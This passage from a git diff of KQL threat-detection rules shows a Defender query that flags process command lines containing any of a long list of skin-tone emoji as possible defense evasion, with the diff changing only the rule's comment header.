ProcessCommandLine contains "🚣🏻‍♂️" or ProcessCommandLine contains "🏊🏻‍♀️" or ProcessCommandLine contains "🏊🏻" or ProcessCommandLine contains "🏊🏻‍♂️" or ProcessCommandLine contains "⛹🏻‍♀️" or ProcessCommandLine contains "⛹🏻" or ProcessCommandLine contains "⛹🏻‍♂️" or ProcessCommandLine contains "🏋🏻‍♀️" or ProcessCommandLine contains "🏋🏻" or ProcessCommandLine contains "🏋🏻‍♂️" or ProcessCommandLine contains "🚴🏻‍♀️" or ProcessCommandLine contains "🚴🏻" or ProcessCommandLine contains "🚴🏻‍♂️" or ProcessCommandLine contains "🚵🏻‍♀️" or ProcessCommandLine contains "🚵🏻" or ProcessCommandLine contains "🚵🏻‍♂️" or ProcessCommandLine contains "🤸🏻‍♀️" or ProcessCommandLine contains "🤸🏻" or ProcessCommandLine contains "🤸🏻‍♂️" or ProcessCommandLine contains "🤽🏻‍♀️" or ProcessCommandLine contains "🤽🏻" or ProcessCommandLine contains "🤽🏻‍♂️" or ProcessCommandLine contains "🤾🏻‍♀️" or ProcessCommandLine contains "🤾🏻" or ProcessCommandLine contains "🤾🏻‍♂️" or ProcessCommandLine contains "🤹🏻‍♀️" or ProcessCommandLine contains "🤹🏻" or ProcessCommandLine contains "🤹🏻‍♂️" or ProcessCommandLine contains "🧘🏻‍♀️" or ProcessCommandLine contains "🧘🏻" or ProcessCommandLine contains "🧘🏻‍♂️" or ProcessCommandLine contains "🛀🏻" or ProcessCommandLine contains "🛌🏻" or ProcessCommandLine contains "👋🏼" or ProcessCommandLine contains "🤚🏼" or ProcessCommandLine contains "🖐🏼" or ProcessCommandLine contains "✋🏼" or ProcessCommandLine contains "🖖🏼" or ProcessCommandLine contains "👌🏼" or ProcessCommandLine contains "🤌🏼" or ProcessCommandLine contains "🤏🏼" or ProcessCommandLine contains "✌🏼" or ProcessCommandLine contains "🤞🏼" or ProcessCommandLine contains "🫰🏼" or ProcessCommandLine contains "🤟🏼" or ProcessCommandLine contains "🤘🏼" or ProcessCommandLine contains "🤙🏼" or ProcessCommandLine contains "🫵🏼" or ProcessCommandLine contains "🫱🏼" or ProcessCommandLine contains "🫲🏼" or ProcessCommandLine contains "🫳🏼" or ProcessCommandLine contains "🫴🏼" or ProcessCommandLine contains "👈🏼" or ProcessCommandLine contains 
"👉🏼" or ProcessCommandLine contains "👆🏼" or ProcessCommandLine contains "🖕🏼" or ProcessCommandLine contains "👇🏼" or ProcessCommandLine contains "☝🏼" or ProcessCommandLine contains "👍🏼" or ProcessCommandLine contains "👎🏼" or ProcessCommandLine contains "✊🏼" or ProcessCommandLine contains "👊🏼" or ProcessCommandLine contains "🤛🏼" or ProcessCommandLine contains "🤜🏼" or ProcessCommandLine contains "👏🏼" or ProcessCommandLine contains "🫶🏼" or ProcessCommandLine contains "🙌🏼" or ProcessCommandLine contains "👐🏼" or ProcessCommandLine contains "🤲🏼" or ProcessCommandLine contains "🙏🏼" or ProcessCommandLine contains "✍🏼" or ProcessCommandLine contains "💪🏼" or ProcessCommandLine contains "🦵🏼" or ProcessCommandLine contains "🦶🏼" or ProcessCommandLine contains "👂🏼" or ProcessCommandLine contains "🦻🏼" or ProcessCommandLine contains "👃🏼" or ProcessCommandLine contains "👶🏼" or ProcessCommandLine contains "👧🏼" or ProcessCommandLine contains "🧒🏼" or ProcessCommandLine contains "👦🏼" or ProcessCommandLine contains "👩🏼" or ProcessCommandLine contains "🧑🏼" or ProcessCommandLine contains "👨🏼" or ProcessCommandLine contains "👩🏼‍🦱" or ProcessCommandLine contains "🧑🏼‍🦱" or ProcessCommandLine contains "👨🏼‍🦱" or ProcessCommandLine contains "👩🏼‍🦰" or ProcessCommandLine contains "🧑🏼‍🦰" or ProcessCommandLine contains "👨🏼‍🦰" or ProcessCommandLine contains "👱🏼‍♀️" or ProcessCommandLine contains "👱🏼" or ProcessCommandLine contains "👱🏼‍♂️" or ProcessCommandLine contains "👩🏼‍🦳" or ProcessCommandLine contains "🧑🏼‍🦳" or ProcessCommandLine contains "👨🏼‍🦳" or ProcessCommandLine contains "👩🏼‍🦲" or ProcessCommandLine contains "🧑🏼‍🦲" or ProcessCommandLine contains "👨🏼‍🦲" or ProcessCommandLine contains "🧔🏼‍♀️" or ProcessCommandLine contains "🧔🏼" or ProcessCommandLine contains "🧔🏼‍♂️" or ProcessCommandLine contains "👵🏼" or ProcessCommandLine contains "🧓🏼" or ProcessCommandLine contains "👴🏼" or ProcessCommandLine contains "👲🏼" or ProcessCommandLine contains "👳🏼‍♀️" or ProcessCommandLine contains "👳🏼" or 
ProcessCommandLine contains "👳🏼‍♂️" or ProcessCommandLine contains "🧕🏼" or ProcessCommandLine contains "👮🏼‍♀️" or ProcessCommandLine contains "👮🏼" or ProcessCommandLine contains "👮🏼‍♂️" or ProcessCommandLine contains "👷🏼‍♀️" or ProcessCommandLine contains "👷🏼" or ProcessCommandLine contains "👷🏼‍♂️" or ProcessCommandLine contains "💂🏼‍♀️" or ProcessCommandLine contains "💂🏼" or ProcessCommandLine contains "💂🏼‍♂️" or ProcessCommandLine contains "🕵🏼‍♀️" or ProcessCommandLine contains "🕵🏼" or ProcessCommandLine contains "🕵🏼‍♂️" or ProcessCommandLine contains "👩🏼‍⚕️" or ProcessCommandLine contains "🧑🏼‍⚕️" or ProcessCommandLine contains "👨🏼‍⚕️" or ProcessCommandLine contains "👩🏼‍🌾" or ProcessCommandLine contains "🧑🏼‍🌾" or ProcessCommandLine contains "👨🏼‍🌾" or ProcessCommandLine contains "👩🏼‍🍳" or ProcessCommandLine contains "🧑🏼‍🍳" or ProcessCommandLine contains "👨🏼‍🍳" or ProcessCommandLine contains "👩🏼‍🎓" or ProcessCommandLine contains "🧑🏼‍🎓" or ProcessCommandLine contains "👨🏼‍🎓" or ProcessCommandLine contains "👩🏼‍🎤" or ProcessCommandLine contains "🧑🏼‍🎤" or ProcessCommandLine contains "👨🏼‍🎤" or ProcessCommandLine contains "👩🏼‍🏫" or ProcessCommandLine contains "🧑🏼‍🏫" or ProcessCommandLine contains "👨🏼‍🏫" or ProcessCommandLine contains "👩🏼‍🏭" or ProcessCommandLine contains "🧑🏼‍🏭" or ProcessCommandLine contains "👨🏼‍🏭" or ProcessCommandLine contains "👩🏼‍💻" or ProcessCommandLine contains "🧑🏼‍💻" or ProcessCommandLine contains "👨🏼‍💻" or ProcessCommandLine contains "👩🏼‍💼" or ProcessCommandLine contains "🧑🏼‍💼" or ProcessCommandLine contains "👨🏼‍💼" or ProcessCommandLine contains "👩🏼‍🔧" or ProcessCommandLine contains "🧑🏼‍🔧" or ProcessCommandLine contains "👨🏼‍🔧" or ProcessCommandLine contains "👩🏼‍🔬" or ProcessCommandLine contains "🧑🏼‍🔬" or ProcessCommandLine contains "👨🏼‍🔬" or ProcessCommandLine contains "👩🏼‍🎨" or ProcessCommandLine contains "🧑🏼‍🎨" or ProcessCommandLine contains "👨🏼‍🎨" or ProcessCommandLine contains "👩🏼‍🚒" or ProcessCommandLine contains "🧑🏼‍🚒" or ProcessCommandLine 
contains "👨🏼‍🚒" or ProcessCommandLine contains "👩🏼‍✈️" or ProcessCommandLine contains "🧑🏼‍✈️" or ProcessCommandLine contains "👨🏼‍✈️" or ProcessCommandLine contains "👩🏼‍🚀" or ProcessCommandLine contains "🧑🏼‍🚀" or ProcessCommandLine contains "👨🏼‍🚀" or ProcessCommandLine contains "👩🏼‍⚖️" or ProcessCommandLine contains "🧑🏼‍⚖️" or ProcessCommandLine contains "👨🏼‍⚖️" or ProcessCommandLine contains "👰🏼‍♀️" or ProcessCommandLine contains "👰🏼" or ProcessCommandLine contains "👰🏼‍♂️" or ProcessCommandLine contains "🤵🏼‍♀️" or ProcessCommandLine contains "🤵🏼" or ProcessCommandLine contains "🤵🏼‍♂️" or ProcessCommandLine contains "👸🏼" or ProcessCommandLine contains "🫅🏼" or ProcessCommandLine contains "🤴🏼" or ProcessCommandLine contains "🥷🏼" or ProcessCommandLine contains "🦸🏼‍♀️" or ProcessCommandLine contains "🦸🏼" or ProcessCommandLine contains "🦸🏼‍♂️" or ProcessCommandLine contains "🦹🏼‍♀️" or ProcessCommandLine contains "🦹🏼" or ProcessCommandLine contains "🦹🏼‍♂️" or ProcessCommandLine contains "🤶🏼" or ProcessCommandLine contains "🧑🏼‍🎄" or ProcessCommandLine contains "🎅🏼" or ProcessCommandLine contains "🧙🏼‍♀️" or ProcessCommandLine contains "🧙🏼" or ProcessCommandLine contains "🧙🏼‍♂️" or ProcessCommandLine contains "🧝🏼‍♀️" or ProcessCommandLine contains "🧝🏼" or ProcessCommandLine contains "🧝🏼‍♂️" or ProcessCommandLine contains "🧛🏼‍♀️" or ProcessCommandLine contains "🧛🏼" or ProcessCommandLine contains "🧛🏼‍♂️" or ProcessCommandLine contains "🧜🏼‍♀️" or ProcessCommandLine contains "🧜🏼" or ProcessCommandLine contains "🧜🏼‍♂️" or ProcessCommandLine contains "🧚🏼‍♀️" or ProcessCommandLine contains "🧚🏼" or ProcessCommandLine contains "🧚🏼‍♂️" or ProcessCommandLine contains "👼🏼" or ProcessCommandLine contains "🤰🏼" or ProcessCommandLine contains "🫄🏼" or ProcessCommandLine contains "🫃🏼" or ProcessCommandLine contains "🤱🏼" or ProcessCommandLine contains "👩🏼‍🍼" or ProcessCommandLine contains "🧑🏼‍🍼" or ProcessCommandLine contains "👨🏼‍🍼" or ProcessCommandLine contains "🙇🏼‍♀️" or ProcessCommandLine 
contains "🙇🏼" or ProcessCommandLine contains "🙇🏼‍♂️" or ProcessCommandLine contains "💁🏼‍♀️" or ProcessCommandLine contains "💁🏼" or ProcessCommandLine contains "💁🏼‍♂️" or ProcessCommandLine contains "🙅🏼‍♀️" or ProcessCommandLine contains "🙅🏼" or ProcessCommandLine contains "🙅🏼‍♂️" or ProcessCommandLine contains "🙆🏼‍♀️" or ProcessCommandLine contains "🙆🏼" or ProcessCommandLine contains "🙆🏼‍♂️" or ProcessCommandLine contains "🙋🏼‍♀️" or ProcessCommandLine contains "🙋🏼" or ProcessCommandLine contains "🙋🏼‍♂️" or ProcessCommandLine contains "🧏🏼‍♀️" or ProcessCommandLine contains "🧏🏼" or ProcessCommandLine contains "🧏🏼‍♂️" or ProcessCommandLine contains "🤦🏼‍♀️" or ProcessCommandLine contains "🤦🏼" or ProcessCommandLine contains "🤦🏼‍♂️" or ProcessCommandLine contains "🤷🏼‍♀️"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_2.kql b/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_2.kql
index 2fee1173..3870877d 100644
--- a/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_2.kql
+++ b/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_2.kql
@@ -1,10 +1,10 @@
-// Title: Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 2
-// Author: @Kostastsale, TheDFIRReport
-// Date: 2022-12-05
-// Level: high
-// Description: Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-
-DeviceProcessEvents
+// Title: Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 2
+// Author: @Kostastsale, TheDFIRReport
+// Date: 2022-12-05
+// Level: high
+// Description: Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "🤷🏼" or ProcessCommandLine contains "🤷🏼‍♂️" or ProcessCommandLine contains "🙎🏼‍♀️" or ProcessCommandLine contains "🙎🏼" or ProcessCommandLine contains "🙎🏼‍♂️" or ProcessCommandLine contains "🙍🏼‍♀️" or ProcessCommandLine contains "🙍🏼" or ProcessCommandLine contains "🙍🏼‍♂️" or ProcessCommandLine contains "💇🏼‍♀️" or ProcessCommandLine contains "💇🏼" or ProcessCommandLine contains "💇🏼‍♂️" or ProcessCommandLine contains "💆🏼‍♀️" or ProcessCommandLine contains "💆🏼" or ProcessCommandLine contains "💆🏼‍♂️" or ProcessCommandLine contains "🧖🏼‍♀️" or ProcessCommandLine contains "🧖🏼" or ProcessCommandLine contains "🧖🏼‍♂️" or ProcessCommandLine contains "💃🏼" or ProcessCommandLine contains "🕺🏼" or ProcessCommandLine contains "🕴🏼" or ProcessCommandLine contains "👩🏼‍🦽" or ProcessCommandLine contains "🧑🏼‍🦽" or ProcessCommandLine contains "👨🏼‍🦽" or ProcessCommandLine contains "👩🏼‍🦼" or ProcessCommandLine contains "🧑🏼‍🦼" or ProcessCommandLine contains "👨🏼‍🦼" or ProcessCommandLine contains "🚶🏼‍♀️" or ProcessCommandLine contains "🚶🏼" or ProcessCommandLine contains "🚶🏼‍♂️" or ProcessCommandLine contains "👩🏼‍🦯" or ProcessCommandLine contains "🧑🏼‍🦯" or ProcessCommandLine contains "👨🏼‍🦯" or 
ProcessCommandLine contains "🧎🏼‍♀️" or ProcessCommandLine contains "🧎🏼" or ProcessCommandLine contains "🧎🏼‍♂️" or ProcessCommandLine contains "🏃🏼‍♀️" or ProcessCommandLine contains "🏃🏼" or ProcessCommandLine contains "🏃🏼‍♂️" or ProcessCommandLine contains "🧍🏼‍♀️" or ProcessCommandLine contains "🧍🏼" or ProcessCommandLine contains "🧍🏼‍♂️" or ProcessCommandLine contains "👭🏼" or ProcessCommandLine contains "🧑🏼‍🤝‍🧑🏼" or ProcessCommandLine contains "👬🏼" or ProcessCommandLine contains "👫🏼" or ProcessCommandLine contains "🧗🏼‍♀️" or ProcessCommandLine contains "🧗🏼" or ProcessCommandLine contains "🧗🏼‍♂️" or ProcessCommandLine contains "🏇🏼" or ProcessCommandLine contains "🏂🏼" or ProcessCommandLine contains "🏌🏼‍♀️" or ProcessCommandLine contains "🏌🏼" or ProcessCommandLine contains "🏌🏼‍♂️" or ProcessCommandLine contains "🏄🏼‍♀️" or ProcessCommandLine contains "🏄🏼" or ProcessCommandLine contains "🏄🏼‍♂️" or ProcessCommandLine contains "🚣🏼‍♀️" or ProcessCommandLine contains "🚣🏼" or ProcessCommandLine contains "🚣🏼‍♂️" or ProcessCommandLine contains "🏊🏼‍♀️" or ProcessCommandLine contains "🏊🏼" or ProcessCommandLine contains "🏊🏼‍♂️" or ProcessCommandLine contains "⛹🏼‍♀️" or ProcessCommandLine contains "⛹🏼" or ProcessCommandLine contains "⛹🏼‍♂️" or ProcessCommandLine contains "🏋🏼‍♀️" or ProcessCommandLine contains "🏋🏼" or ProcessCommandLine contains "🏋🏼‍♂️" or ProcessCommandLine contains "🚴🏼‍♀️" or ProcessCommandLine contains "🚴🏼" or ProcessCommandLine contains "🚴🏼‍♂️" or ProcessCommandLine contains "🚵🏼‍♀️" or ProcessCommandLine contains "🚵🏼" or ProcessCommandLine contains "🚵🏼‍♂️" or ProcessCommandLine contains "🤸🏼‍♀️" or ProcessCommandLine contains "🤸🏼" or ProcessCommandLine contains "🤸🏼‍♂️" or ProcessCommandLine contains "🤽🏼‍♀️" or ProcessCommandLine contains "🤽🏼" or ProcessCommandLine contains "🤽🏼‍♂️" or ProcessCommandLine contains "🤾🏼‍♀️" or ProcessCommandLine contains "🤾🏼" or ProcessCommandLine contains "🤾🏼‍♂️" or ProcessCommandLine contains "🤹🏼‍♀️" or ProcessCommandLine contains 
"🤹🏼" or ProcessCommandLine contains "🤹🏼‍♂️" or ProcessCommandLine contains "🧘🏼‍♀️" or ProcessCommandLine contains "🧘🏼" or ProcessCommandLine contains "🧘🏼‍♂️" or ProcessCommandLine contains "🛀🏼" or ProcessCommandLine contains "🛌🏼" or ProcessCommandLine contains "👋🏽" or ProcessCommandLine contains "🤚🏽" or ProcessCommandLine contains "🖐🏽" or ProcessCommandLine contains "✋🏽" or ProcessCommandLine contains "🖖🏽" or ProcessCommandLine contains "👌🏽" or ProcessCommandLine contains "🤌🏽" or ProcessCommandLine contains "🤏🏽" or ProcessCommandLine contains "✌🏽" or ProcessCommandLine contains "🤞🏽" or ProcessCommandLine contains "🫰🏽" or ProcessCommandLine contains "🤟🏽" or ProcessCommandLine contains "🤘🏽" or ProcessCommandLine contains "🤙🏽" or ProcessCommandLine contains "🫵🏽" or ProcessCommandLine contains "🫱🏽" or ProcessCommandLine contains "🫲🏽" or ProcessCommandLine contains "🫳🏽" or ProcessCommandLine contains "🫴🏽" or ProcessCommandLine contains "👈🏽" or ProcessCommandLine contains "👉🏽" or ProcessCommandLine contains "👆🏽" or ProcessCommandLine contains "🖕🏽" or ProcessCommandLine contains "👇🏽" or ProcessCommandLine contains "☝🏽" or ProcessCommandLine contains "👍🏽" or ProcessCommandLine contains "👎🏽" or ProcessCommandLine contains "✊🏽" or ProcessCommandLine contains "👊🏽" or ProcessCommandLine contains "🤛🏽" or ProcessCommandLine contains "🤜🏽" or ProcessCommandLine contains "👏🏽" or ProcessCommandLine contains "🫶🏽" or ProcessCommandLine contains "🙌🏽" or ProcessCommandLine contains "👐🏽" or ProcessCommandLine contains "🤲🏽" or ProcessCommandLine contains "🙏🏽" or ProcessCommandLine contains "✍🏽" or ProcessCommandLine contains "💪🏽" or ProcessCommandLine contains "🦵🏽" or ProcessCommandLine contains "🦶🏽" or ProcessCommandLine contains "👂🏽" or ProcessCommandLine contains "🦻🏽" or ProcessCommandLine contains "👃🏽" or ProcessCommandLine contains "👶🏽" or ProcessCommandLine contains "👧🏽" or ProcessCommandLine contains "🧒🏽" or ProcessCommandLine contains "👦🏽" or ProcessCommandLine contains "👩🏽" or 
ProcessCommandLine contains "🧑🏽" or ProcessCommandLine contains "👨🏽" or ProcessCommandLine contains "👩🏽‍🦱" or ProcessCommandLine contains "🧑🏽‍🦱" or ProcessCommandLine contains "👨🏽‍🦱" or ProcessCommandLine contains "👩🏽‍🦰" or ProcessCommandLine contains "🧑🏽‍🦰" or ProcessCommandLine contains "👨🏽‍🦰" or ProcessCommandLine contains "👱🏽‍♀️" or ProcessCommandLine contains "👱🏽" or ProcessCommandLine contains "👱🏽‍♂️" or ProcessCommandLine contains "👩🏽‍🦳" or ProcessCommandLine contains "🧑🏽‍🦳" or ProcessCommandLine contains "👨🏽‍🦳" or ProcessCommandLine contains "👩🏽‍🦲" or ProcessCommandLine contains "🧑🏽‍🦲" or ProcessCommandLine contains "👨🏽‍🦲" or ProcessCommandLine contains "🧔🏽‍♀️" or ProcessCommandLine contains "🧔🏽" or ProcessCommandLine contains "🧔🏽‍♂️" or ProcessCommandLine contains "👵🏽" or ProcessCommandLine contains "🧓🏽" or ProcessCommandLine contains "👴🏽" or ProcessCommandLine contains "👲🏽" or ProcessCommandLine contains "👳🏽‍♀️" or ProcessCommandLine contains "👳🏽" or ProcessCommandLine contains "👳🏽‍♂️" or ProcessCommandLine contains "🧕🏽" or ProcessCommandLine contains "👮🏽‍♀️" or ProcessCommandLine contains "👮🏽" or ProcessCommandLine contains "👮🏽‍♂️" or ProcessCommandLine contains "👷🏽‍♀️" or ProcessCommandLine contains "👷🏽" or ProcessCommandLine contains "👷🏽‍♂️" or ProcessCommandLine contains "💂🏽‍♀️" or ProcessCommandLine contains "💂🏽" or ProcessCommandLine contains "💂🏽‍♂️" or ProcessCommandLine contains "🕵🏽‍♀️" or ProcessCommandLine contains "🕵🏽" or ProcessCommandLine contains "🕵🏽‍♂️" or ProcessCommandLine contains "👩🏽‍⚕️" or ProcessCommandLine contains "🧑🏽‍⚕️" or ProcessCommandLine contains "👨🏽‍⚕️" or ProcessCommandLine contains "👩🏽‍🌾" or ProcessCommandLine contains "🧑🏽‍🌾" or ProcessCommandLine contains "👨🏽‍🌾" or ProcessCommandLine contains "👩🏽‍🍳" or ProcessCommandLine contains "🧑🏽‍🍳" or ProcessCommandLine contains "👨🏽‍🍳" or ProcessCommandLine contains "👩🏽‍🎓" or ProcessCommandLine contains "🧑🏽‍🎓" or ProcessCommandLine contains "👨🏽‍🎓" or ProcessCommandLine contains "👩🏽‍🎤" 
or ProcessCommandLine contains "🧑🏽‍🎤" or ProcessCommandLine contains "👨🏽‍🎤" or ProcessCommandLine contains "👩🏽‍🏫" or ProcessCommandLine contains "🧑🏽‍🏫" or ProcessCommandLine contains "👨🏽‍🏫" or ProcessCommandLine contains "👩🏽‍🏭" or ProcessCommandLine contains "🧑🏽‍🏭" or ProcessCommandLine contains "👨🏽‍🏭" or ProcessCommandLine contains "👩🏽‍💻" or ProcessCommandLine contains "🧑🏽‍💻" or ProcessCommandLine contains "👨🏽‍💻" or ProcessCommandLine contains "👩🏽‍💼" or ProcessCommandLine contains "🧑🏽‍💼" or ProcessCommandLine contains "👨🏽‍💼" or ProcessCommandLine contains "👩🏽‍🔧" or ProcessCommandLine contains "🧑🏽‍🔧" or ProcessCommandLine contains "👨🏽‍🔧" or ProcessCommandLine contains "👩🏽‍🔬" or ProcessCommandLine contains "🧑🏽‍🔬" or ProcessCommandLine contains "👨🏽‍🔬" or ProcessCommandLine contains "👩🏽‍🎨" or ProcessCommandLine contains "🧑🏽‍🎨" or ProcessCommandLine contains "👨🏽‍🎨" or ProcessCommandLine contains "👩🏽‍🚒" or ProcessCommandLine contains "🧑🏽‍🚒" or ProcessCommandLine contains "👨🏽‍🚒" or ProcessCommandLine contains "👩🏽‍✈️" or ProcessCommandLine contains "🧑🏽‍✈️" or ProcessCommandLine contains "👨🏽‍✈️" or ProcessCommandLine contains "👩🏽‍🚀" or ProcessCommandLine contains "🧑🏽‍🚀" or ProcessCommandLine contains "👨🏽‍🚀" or ProcessCommandLine contains "👩🏽‍⚖️" or ProcessCommandLine contains "🧑🏽‍⚖️" or ProcessCommandLine contains "👨🏽‍⚖️" or ProcessCommandLine contains "👰🏽‍♀️" or ProcessCommandLine contains "👰🏽" or ProcessCommandLine contains "👰🏽‍♂️" or ProcessCommandLine contains "🤵🏽‍♀️" or ProcessCommandLine contains "🤵🏽" or ProcessCommandLine contains "🤵🏽‍♂️" or ProcessCommandLine contains "👸🏽" or ProcessCommandLine contains "🫅🏽" or ProcessCommandLine contains "🤴🏽" or ProcessCommandLine contains "🥷🏽" or ProcessCommandLine contains "🦸🏽‍♀️" or ProcessCommandLine contains "🦸🏽" or ProcessCommandLine contains "🦸🏽‍♂️" or ProcessCommandLine contains "🦹🏽‍♀️" or ProcessCommandLine contains "🦹🏽" or ProcessCommandLine contains "🦹🏽‍♂️" or ProcessCommandLine contains "🤶🏽" or ProcessCommandLine 
contains "🧑🏽‍🎄" or ProcessCommandLine contains "🎅🏽" or ProcessCommandLine contains "🧙🏽‍♀️" or ProcessCommandLine contains "🧙🏽" or ProcessCommandLine contains "🧙🏽‍♂️" or ProcessCommandLine contains "🧝🏽‍♀️" or ProcessCommandLine contains "🧝🏽" or ProcessCommandLine contains "🧝🏽‍♂️" or ProcessCommandLine contains "🧛🏽‍♀️" or ProcessCommandLine contains "🧛🏽" or ProcessCommandLine contains "🧛🏽‍♂️" or ProcessCommandLine contains "🧜🏽‍♀️" or ProcessCommandLine contains "🧜🏽" or ProcessCommandLine contains "🧜🏽‍♂️" or ProcessCommandLine contains "🧚🏽‍♀️" or ProcessCommandLine contains "🧚🏽" or ProcessCommandLine contains "🧚🏽‍♂️" or ProcessCommandLine contains "👼🏽" or ProcessCommandLine contains "🤰🏽" or ProcessCommandLine contains "🫄🏽" or ProcessCommandLine contains "🫃🏽" or ProcessCommandLine contains "🤱🏽" or ProcessCommandLine contains "👩🏽‍🍼" or ProcessCommandLine contains "🧑🏽‍🍼" or ProcessCommandLine contains "👨🏽‍🍼" or ProcessCommandLine contains "🙇🏽‍♀️" or ProcessCommandLine contains "🙇🏽" or ProcessCommandLine contains "🙇🏽‍♂️" or ProcessCommandLine contains "💁🏽‍♀️" or ProcessCommandLine contains "💁🏽" or ProcessCommandLine contains "💁🏽‍♂️" or ProcessCommandLine contains "🙅🏽‍♀️" or ProcessCommandLine contains "🙅🏽" or ProcessCommandLine contains "🙅🏽‍♂️" or ProcessCommandLine contains "🙆🏽‍♀️" or ProcessCommandLine contains "🙆🏽" or ProcessCommandLine contains "🙆🏽‍♂️" or ProcessCommandLine contains "🙋🏽‍♀️" or ProcessCommandLine contains "🙋🏽" or ProcessCommandLine contains "🙋🏽‍♂️" or ProcessCommandLine contains "🧏🏽‍♀️" or ProcessCommandLine contains "🧏🏽" or ProcessCommandLine contains "🧏🏽‍♂️" or ProcessCommandLine contains "🤦🏽‍♀️" or ProcessCommandLine contains "🤦🏽" or ProcessCommandLine contains "🤦🏽‍♂️" or ProcessCommandLine contains "🤷🏽‍♀️" or ProcessCommandLine contains "🤷🏽" or ProcessCommandLine contains "🤷🏽‍♂️" or ProcessCommandLine contains "🙎🏽‍♀️" or ProcessCommandLine contains "🙎🏽" or ProcessCommandLine contains "🙎🏽‍♂️" or ProcessCommandLine contains "🙍🏽‍♀️" or 
ProcessCommandLine contains "🙍🏽" or ProcessCommandLine contains "🙍🏽‍♂️" or ProcessCommandLine contains "💇🏽‍♀️" or ProcessCommandLine contains "💇🏽" or ProcessCommandLine contains "💇🏽‍♂️" or ProcessCommandLine contains "💆🏽‍♀️" or ProcessCommandLine contains "💆🏽" or ProcessCommandLine contains "💆🏽‍♂️" or ProcessCommandLine contains "🧖🏽‍♀️" or ProcessCommandLine contains "🧖🏽" or ProcessCommandLine contains "🧖🏽‍♂️" or ProcessCommandLine contains "💃🏽" or ProcessCommandLine contains "🕺🏽" or ProcessCommandLine contains "🕴🏽" or ProcessCommandLine contains "👩🏽‍🦽" or ProcessCommandLine contains "🧑🏽‍🦽" or ProcessCommandLine contains "👨🏽‍🦽" or ProcessCommandLine contains "👩🏽‍🦼" or ProcessCommandLine contains "🧑🏽‍🦼" or ProcessCommandLine contains "👨🏽‍🦼" or ProcessCommandLine contains "🚶🏽‍♀️" or ProcessCommandLine contains "🚶🏽" or ProcessCommandLine contains "🚶🏽‍♂️" or ProcessCommandLine contains "👩🏽‍🦯" or ProcessCommandLine contains "🧑🏽‍🦯" or ProcessCommandLine contains "👨🏽‍🦯" or ProcessCommandLine contains "🧎🏽‍♀️" or ProcessCommandLine contains "🧎🏽" or ProcessCommandLine contains "🧎🏽‍♂️" or ProcessCommandLine contains "🏃🏽‍♀️" or ProcessCommandLine contains "🏃🏽" or ProcessCommandLine contains "🏃🏽‍♂️" or ProcessCommandLine contains "🧍🏽‍♀️" or ProcessCommandLine contains "🧍🏽" or ProcessCommandLine contains "🧍🏽‍♂️" or ProcessCommandLine contains "👭🏽" or ProcessCommandLine contains "🧑🏽‍🤝‍🧑🏽" or ProcessCommandLine contains "👬🏽" or ProcessCommandLine contains "👫🏽" or ProcessCommandLine contains "🧗🏽‍♀️" or ProcessCommandLine contains "🧗🏽" or ProcessCommandLine contains "🧗🏽‍♂️" or ProcessCommandLine contains "🏇🏽" or ProcessCommandLine contains "🏂🏽" or ProcessCommandLine contains "🏌🏽‍♀️" or ProcessCommandLine contains "🏌🏽" or ProcessCommandLine contains "🏌🏽‍♂️" or ProcessCommandLine contains "🏄🏽‍♀️" or ProcessCommandLine contains "🏄🏽" or ProcessCommandLine contains "🏄🏽‍♂️" or ProcessCommandLine contains "🚣🏽‍♀️" or ProcessCommandLine contains "🚣🏽" or ProcessCommandLine contains "🚣🏽‍♂️" or 
ProcessCommandLine contains "🏊🏽‍♀️" or ProcessCommandLine contains "🏊🏽" or ProcessCommandLine contains "🏊🏽‍♂️" or ProcessCommandLine contains "⛹🏽‍♀️" or ProcessCommandLine contains "⛹🏽" or ProcessCommandLine contains "⛹🏽‍♂️" or ProcessCommandLine contains "🏋🏽‍♀️" or ProcessCommandLine contains "🏋🏽" or ProcessCommandLine contains "🏋🏽‍♂️" or ProcessCommandLine contains "🚴🏽‍♀️" or ProcessCommandLine contains "🚴🏽" or ProcessCommandLine contains "🚴🏽‍♂️" or ProcessCommandLine contains "🚵🏽‍♀️" or ProcessCommandLine contains "🚵🏽" or ProcessCommandLine contains "🚵🏽‍♂️" or ProcessCommandLine contains "🤸🏽‍♀️" or ProcessCommandLine contains "🤸🏽" or ProcessCommandLine contains "🤸🏽‍♂️" or ProcessCommandLine contains "🤽🏽‍♀️" or ProcessCommandLine contains "🤽🏽" or ProcessCommandLine contains "🤽🏽‍♂️" or ProcessCommandLine contains "🤾🏽‍♀️" or ProcessCommandLine contains "🤾🏽" or ProcessCommandLine contains "🤾🏽‍♂️" or ProcessCommandLine contains "🤹🏽‍♀️" or ProcessCommandLine contains "🤹🏽" or ProcessCommandLine contains "🤹🏽‍♂️" or ProcessCommandLine contains "🧘🏽‍♀️" or ProcessCommandLine contains "🧘🏽" or ProcessCommandLine contains "🧘🏽‍♂️" or ProcessCommandLine contains "🛀🏽" or ProcessCommandLine contains "🛌🏽" or ProcessCommandLine contains "👋🏾" or ProcessCommandLine contains "🤚🏾" or ProcessCommandLine contains "🖐🏾" or ProcessCommandLine contains "✋🏾" or ProcessCommandLine contains "🖖🏾" or ProcessCommandLine contains "👌🏾" or ProcessCommandLine contains "🤌🏾" or ProcessCommandLine contains "🤏🏾" or ProcessCommandLine contains "✌🏾" or ProcessCommandLine contains "🤞🏾" or ProcessCommandLine contains "🫰🏾" or ProcessCommandLine contains "🤟🏾" or ProcessCommandLine contains "🤘🏾" or ProcessCommandLine contains "🤙🏾" or ProcessCommandLine contains "🫵🏾" or ProcessCommandLine contains "🫱🏾" or ProcessCommandLine contains "🫲🏾" or ProcessCommandLine contains "🫳🏾" or ProcessCommandLine contains "🫴🏾" or ProcessCommandLine contains "👈🏾" or ProcessCommandLine contains "👉🏾" or ProcessCommandLine contains 
